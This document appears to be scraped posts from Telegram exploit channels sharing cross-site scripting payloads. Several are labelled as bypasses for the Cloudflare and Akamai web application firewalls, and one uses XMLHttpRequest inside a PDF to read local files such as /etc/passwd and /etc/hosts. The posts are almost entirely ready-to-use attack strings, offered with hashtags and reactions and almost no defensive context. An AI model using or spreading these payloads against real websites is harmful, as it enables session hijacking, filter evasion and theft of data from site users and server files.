<Img Src=javascript:alert(1)>
OnError=location=src
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E
#XSS
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9⚡2❤2❤🔥1
Akamai WAF
Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
Vector PoC
#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5🔥2👍1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
javascript:var{a:onerror}={a:alert};throw%20document.domain
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4⚡3🔥3👍1
CloudFlare Bypass
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=alert(1)>
#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡11❤1
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)>
[Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)>
[XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥4❤2👍1👎1
XSS to Exfiltrate Data from PDFs 🔥🥵
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍5👎1
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
XSS of the day : DOM-XSS-SiteMinder
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Nuclei tamplete
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡6❤🔥3
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤2⚡1❤🔥1
⚡2👍1